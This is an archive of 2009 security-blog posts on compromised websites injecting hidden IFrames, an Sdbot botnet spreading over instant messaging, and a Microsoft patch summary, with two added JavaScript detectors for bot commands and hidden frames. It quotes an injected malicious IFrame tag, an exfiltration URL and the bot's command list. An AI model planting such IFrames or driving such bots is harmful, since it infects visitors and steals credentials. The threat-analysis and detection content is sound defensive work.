6/15/2009 4:15:00 PM

Turkish governmental websites under attack

by Bahaa Naamneh

Several Turkish governmental websites have come under web attacks. The following websites have been compromised and obfuscated JavaScripts and IFrame tags have been injected into them:

http://[hidden]isar.meb.gov.tr
http://[hidden]ele.meb.gov.tr
http://[hidden]kale.meb.gov.tr
http://[hidden]lu-gsim.gov.tr
http://[hidden]zigrsh.gov.tr

Each of the IFrame tags leads to a different malicious domain which ends up downloading a variety of Trojans including infostealers, and botnet Trojans.

One of the IFrames leads to a rather interesting malicious script with a 0 detection rate in VirusTotal (we have already added a signature for this script, and it will be available in the next update).

The obfuscation routine of that script relies heavily on HTML tags: the data needed by the JavaScript de-obfuscation routine is stored inside HTML tags rather than in the script itself.

The script then downloads a Trojan Downloader which, once run, downloads another Trojan that steals FTP accounts. The latter searches the file system and the registry of multiple FTP clients for saved FTP accounts and sends them to a Chinese domain:
http://f97q.cn/r4/t1.php


Tags:

Malweb

6/10/2009 2:05:00 PM

Hackers used a university website to host their exploit kit

by Bahaa Naamneh

The website of the embassy of Belize in Taiwan has been compromised and an obfuscated JavaScript has been injected into it.

After decoding, the script reveals itself as an IFrame pointing to one of the pages on the Kaohsiung Medical University website:

<iframe src="http://[HIDDEN].club.kmu.edu.tw/ice/index.php" width="0" height="0"></iframe>

We are all too familiar with the usual scenario where hackers compromise a legitimate website so that its visitors get redirected to the hackers’ own servers, where the exploit kit is hosted. The ironic thing this time is that the hackers didn’t redirect victims to servers of their own, but to the university website, which they had compromised and installed their exploit kit on (probably an IcePack), and which they then used for other compromised websites.

At the time of writing, however, the exploit-kit has been removed from the university website.


6/10/2009 12:01:00 PM

Microsoft Security Bulletin Summary for June 2009

by Mahran Amona

Microsoft has released its security bulletin for June 2009 to address three vulnerabilities in Microsoft Windows products, six of them critical. We strongly suggest applying the patches provided by Microsoft for these vulnerabilities.

Critical

Vulnerabilities in Active Directory Could Allow Remote Code Execution
This security update resolves two privately reported vulnerabilities in implementations of Active Directory on Microsoft Windows 2000 Server and Windows Server 2003, and Active Directory Application Mode (ADAM) when installed on Windows XP Professional and Windows Server 2003.

The patch and additional information are available here.

Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution
This security update resolves three privately reported vulnerabilities in Windows Print Spooler. The most severe vulnerability could allow remote code execution if an affected server received a specially crafted RPC request.

The patch and additional information are available here.

Cumulative Security Update for Internet Explorer
This security update resolves seven privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer.

The patch and additional information are available here.

Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution
This security update resolves two privately reported vulnerabilities that could allow remote code execution if a user opens a specially crafted Word file. An attacker who successfully exploited either vulnerability could take complete control of an affected system.

The patch and additional information are available here.

Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution
This security update resolves several privately reported vulnerabilities that could allow remote code execution if a user opens a specially crafted Excel file that includes a malformed record object. An attacker who successfully exploited any of these vulnerabilities could take complete control of an affected system.

The patch and additional information are available here.

Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution
This security update resolves a privately reported vulnerability in the Microsoft Works converters. The vulnerability could allow remote code execution if a user opens a specially crafted Works file. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user.

The patch and additional information are available here.

Important

Vulnerability in RPC Could Allow Elevation of Privilege
This security update resolves a publicly disclosed vulnerability in the Windows remote procedure call (RPC) facility where the RPC Marshalling Engine does not update its internal state appropriately. The vulnerability could allow an attacker to execute arbitrary code and take complete control of an affected system.

The patch and additional information are available here.

Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
This security update resolves two publicly disclosed and two privately reported vulnerabilities in the Windows kernel that could allow elevation of privilege. An attacker who successfully exploited any of these vulnerabilities could execute arbitrary code and take complete control of an affected system.

The patch and additional information are available here.

Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege
This security update resolves one publicly disclosed vulnerability and one privately reported vulnerability in Microsoft Internet Information Services (IIS). The vulnerabilities could allow elevation of privilege if an attacker sent a specially crafted HTTP request to a Web site that requires authentication.

The patch and additional information are available here.

Moderate

Vulnerability in Windows Search Could Allow Information Disclosure
This security update resolves a privately reported vulnerability in Windows Search. The vulnerability could allow information disclosure if a user performs a search that returns a specially crafted file as the first result or if the user previews a specially crafted file from the search results.

The patch and additional information are available here.

5/17/2009 4:54:00 PM

Analysis of botnet attack targeting Instant Messaging users

by Bahaa Naamneh

In this blog post I’ll examine a botnet attack utilizing Instant Messaging services such as AIM and Live Messenger to recruit infected computers. This botnet spreads a malicious Sdbot variant with a low detection rate; the following is a detailed technical analysis of this bot.

The Attack Vector
The Trojan itself arrives through MSN Messenger as a message with a link sent out by contacts with infected systems. Here is an example of a sent message:

Once the user clicks on the link, an executable is downloaded to the user’s system. The executable does not launch on its own, however: the user must run it manually.

The downloaded executable is a Win32 Cabinet Self-Extractor given a name which makes it appear like an image file: IMG000985215488524-JPEG.EXE.

This Trojan has a very low detection rate according to VirusTotal. Up to the time of writing, only 7 out of 40 AV products detect this bot.


Vendor             Version       Update       Result
a-squared          4.0.0.101     2009.05.13   Win32.SuspectCrc!IK
AntiVir            7.9.0.166     2009.05.13   SPR/Tool.Injector.101376B
eSafe              7.0.17.0      2009.05.13   Win32.Trojan
Ikarus             T3.1.1.49.0   2009.05.13   Win32.SuspectCrc
McAfee-GW-Edition  6.7.6         2009.05.13   Riskware.Tool.Injector.101376B
Microsoft          1.4602        2009.05.13   VirTool:Win32/Injector.gen!B
Prevx              3.0           2009.05.13   Medium Risk Malware


The Cabinet Self-Extractor drops a file named d.exe, which carries another packed PE file in its resource section (the file is packed with a custom, private packer).

The decoding routine

The decoding routine of the bot (part 1).

The decoding routine of the bot (part 2).

The decoding routine of the bot (part 3).

Now, to get the new executable, we can simply dump the memory into a file and, using a hex editor, cut the junk data from the beginning of the dump file:

Then, using a tool such as Stud_PE, we cut off the extra data at the end of the dump file:

Now we have the real Trojan. At a glance, we can clearly see it is an IRC bot and, to be more accurate, an SdBot: it connects to an IRC server and joins a channel, waiting for further commands from its operators.

The detection rate in VirusTotal gets better now, where 21 out of 40 detect this bot:


Vendor             Version       Update       Result
a-squared          4.0.0.101     2009.05.13   Virus.Win32.IRCBot.BSX!IK
AntiVir            7.9.0.166     2009.05.13   TR/Spy.Gen
Authentium         5.1.2.4       2009.05.13   W32/Bloop.A.gen!Eldorado
Avast              4.8.1335.0    2009.05.12   Win32:IRCBot-BSX
BitDefender        7.2           2009.05.13   Backdoor.Agent.AAAT
DrWeb              5.0.0.12182   2009.05.13   DLOADER.IRC.Trojan
eSafe              7.0.17.0      2009.05.13   Win32.Trojan
F-Prot             4.4.4.56      2009.05.13   W32/Bloop.A.gen!Eldorado
F-Secure           8.0.14470.0   2009.05.13   Backdoor.Win32.SdBot.eit
GData              19            2009.05.13   Backdoor.Agent.AAAT
Ikarus             T3.1.1.49.0   2009.05.13   Virus.Win32.IRCBot.BSX
Kaspersky          7.0.0.125     2009.05.13   Backdoor.Win32.SdBot.eit
McAfee             5613          2009.05.12   W32/Sdbot.worm.gen.a
McAfee+Artemis     5613          2009.05.12   W32/Sdbot.worm.gen.a
McAfee-GW-Edition  6.7.6         2009.05.13   Trojan.Spy.Gen
Microsoft          1.4602        2009.05.13   Worm:Win32/Pushbot.gen
NOD32              4070          2009.05.13   probably a variant of IRC/SdBot
Norman             6.01.05       2009.05.13   W32/Malware
Rising             21.29.24.00   2009.05.13   Worm.Win32.Pushbot.ad
Symantec           1.4.4.12      2009.05.13   W32.Spybot.Worm
VBA32              3.12.10.5     2009.05.13   suspected of Backdoor.xBot.1 (paranoid heuristics)


The following are the commands used by this botnet:
login || l
logout || lo
rm
download
update
gone || rmzerm3b1tch
threads || t
r.getfile
r.new
r.update || r.upd4te
msn.msg
msn.stop
aim.msg
aim.stop
trion.msg
trion.stop
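From the defender's side, the command list above is a usable signature for IRC traffic captured by a network sensor. The following is an added example, not part of the original analysis; its log lines are constructed, and stripping a leading ".", "!" or "~" prefix is an assumption, since the post lists the commands but not how operators type them.

```javascript
// Added example (not part of the original analysis): flag operator commands from the
// SdBot command list above inside captured IRC traffic, e.g. lines from a network sensor.
// The log lines are constructed; stripping a leading ".", "!" or "~" prefix is an
// assumption, since the post lists the commands but not how operators type them.
const BOT_COMMANDS = new Map([
  ['login', 'login'], ['l', 'login'], ['logout', 'logout'], ['lo', 'logout'],
  ['rm', 'rm'], ['download', 'download'], ['update', 'update'],
  ['gone', 'gone'], ['rmzerm3b1tch', 'gone'], ['threads', 'threads'], ['t', 'threads'],
  ['r.getfile', 'r.getfile'], ['r.new', 'r.new'], ['r.update', 'r.update'],
  ['r.upd4te', 'r.update'], ['msn.msg', 'msn.msg'], ['msn.stop', 'msn.stop'],
  ['aim.msg', 'aim.msg'], ['aim.stop', 'aim.stop'],
  ['trion.msg', 'trion.msg'], ['trion.stop', 'trion.stop'],
]);
// One- and two-letter aliases also occur in normal chat, so they get low confidence.
const WEAK_ALIASES = new Set(['l', 'lo', 't']);

// :nick!user@host PRIVMSG <target> :<text>
const IRC_PRIVMSG = /^:([^!\s]+)\S*\s+PRIVMSG\s+(\S+)\s+:(.*)$/;
const PREFIX_CHARS = /^[.!~]/;   // assumed operator prefix characters

// Return one hit per PRIVMSG whose first word (minus an optional prefix) is a bot command.
function detectBotCommands(lines) {
  const hits = [];
  for (const line of lines) {
    const m = IRC_PRIVMSG.exec(line.trim());
    if (!m) continue;                                  // JOIN, PING, etc. carry no commands
    const [, nick, target, text] = m;
    const token = text.trim().split(/\s+/)[0].replace(PREFIX_CHARS, '').toLowerCase();
    const command = BOT_COMMANDS.get(token);
    if (!command) continue;
    hits.push({ nick, target, token, command,
                confidence: WEAK_ALIASES.has(token) ? 'low' : 'high' });
  }
  return hits;
}

// Constructed capture: an operator authenticating, starting an MSN message run, polling
// threads and pushing an update, mixed with ordinary chatter and a bot status reply.
const SAMPLE_LOG = [
  ':op!a@b PRIVMSG #c :hello everyone',
  ':op!a@b PRIVMSG #c :.login s3cr3t',
  ':op!a@b PRIVMSG #c :msn.msg http://constructed.example/pic.exe check this pic',
  ':bot1!x@y PRIVMSG #c :[MSN] sent 12 messages',
  ':op!a@b PRIVMSG #c :t',
  ':op!a@b PRIVMSG #c :!r.upd4te http://constructed.example/d.exe',
  'PING :irc.constructed.example',
];

console.log(detectBotCommands(SAMPLE_LOG));
```

Short aliases such as "t" will fire on ordinary chat; the low-confidence hits are best correlated with a high-confidence login from the same nick before alerting.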

Inspecting the strings of the new executable, we can see that the bot’s many functionalities include:
- Download and execute remote files
- Registry manipulation
- Services manipulation
- Opening sockets, including sending and receiving data through sockets
- Sending/Downloading data through HTTP
- Uploading/Downloading files through FTP
- DNS manipulation
- Open ports in the infected systems and hide those ports
- Retrieve TCP, UDP listener tables
- Retrieve MIB-II interface table
- Retrieve IP-to-physical address mapping table
- Add/Remove Network Connections
- Keylogging
- ARP table manipulation
- ODBC functionalities


Malweb

5/14/2009 10:49:00 AM

How a popular nightlife website ruined its visitors' weekend

by Mahran Amona

Once again, eCriminals took advantage of a legitimate and popular website as an attack vector for the purpose of propagating Malweb. Layla.co.il, a popular nightlife website in Israel, was compromised by eCriminals and is serving up a malicious bot to its visitors.


Image 1: Entries in our AID (Attack Intelligence Datacenter) indicating that layla.co.il contains MalWeb.

A hidden IFrame tag has been injected into all pages under the “campaign” directory. The IFrame loads a malicious page which attempts to download and execute a Trojan using one of the following exploits:
1. Microsoft Access Snapshot Viewer ActiveX Control Exploit
2. SWF Exploit
3. PDF Exploit
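The hidden off-site IFrame is the common thread of the injections reported in this post and in the Turkish government and Belize embassy posts above: a frame with zero width and height (or hidden by CSS) whose src points at another host. The following scanner is an added example, not code from the original posts; the sample HTML and every hostname in it are constructed for the demo.

```javascript
// Added example (not from the original posts): a heuristic scanner for the injected hidden
// IFrames described above: zero-sized or CSS-hidden frames that load a page from another host.
// The sample HTML and every hostname in it are constructed for this demo.
const IFRAME_RE = /<iframe\b([^>]*)>/gi;
const ATTR_RE = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;

// Parse one tag's attribute text into an object keyed by lowercase attribute name.
function parseAttrs(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = (m[2] ?? m[3] ?? m[4] ?? '').trim();
  }
  return attrs;
}

// Zero width/height (with or without "px") or hiding CSS means the frame is concealed.
function concealmentReason(attrs) {
  const zero = v => v !== undefined && /^0(px)?$/i.test(v);
  const style = (attrs.style || '').toLowerCase();
  if (zero(attrs.width) || zero(attrs.height)) return 'zero-size';
  if (/display\s*:\s*none|visibility\s*:\s*hidden/.test(style)) return 'css-hidden';
  return null;
}

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// Report concealed iframes whose src points to a host other than the page's own.
// Relative or unparsable src values are treated as same-site and left alone.
function findInjectedIframes(html, pageHost) {
  const hits = [];
  for (const m of html.matchAll(IFRAME_RE)) {
    const attrs = parseAttrs(m[1]);
    const host = hostOf(attrs.src || '');
    const reason = concealmentReason(attrs);
    if (host && host !== pageHost.toLowerCase() && reason) hits.push({ src: attrs.src, host, reason });
  }
  return hits;
}

// Constructed page: a visible third-party embed, a same-site hidden frame, and two
// injected frames of the kind the posts describe.
const SAMPLE_PAGE = `<html><body><h1>Campaign page</h1>
<iframe src="http://video.example.net/player?id=1" width="640" height="360"></iframe>
<iframe src="/stats/pixel.html" width="0" height="0"></iframe>
<iframe src="http://club.university.example/ice/index.php" width="0" height="0"></iframe>
<iframe src='http://malweb.example/in.php' style="display:none;"></iframe>
</body></html>`;
console.log(findInjectedIframes(SAMPLE_PAGE, 'www.example.org'));
```

Running this over a site's own crawl (or over proxy-captured responses) turns the injection pattern from these posts into a repeatable integrity check; frames built dynamically by obfuscated JavaScript, as in the Turkish case, only appear after the script runs, so the scan should be applied to rendered DOM output as well as raw HTML.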

The downloaded malware executable is a bot instructed to download a rootkit which will function as a sort of keeper for it. The rootkit installs itself as a service named: “DCOM Server Process Launcher DcomLaunchMessenger”.

To evade detection, this Trojan prevents a long list of Antivirus and security applications from running.

Once the bot is launched, it sends some information to its C&C (Command and Control) system hosted at a Ukrainian server.

More than 200,000 machines worldwide have been infected by this attack so far; each infected machine joins an army of botnet zombies ready to be controlled by eCriminals to launch cyber attacks. The following is a map showing the distribution of infected machines.


Image 2: A distribution map showing the locations of machines infected by the attack.


Malweb | eCrime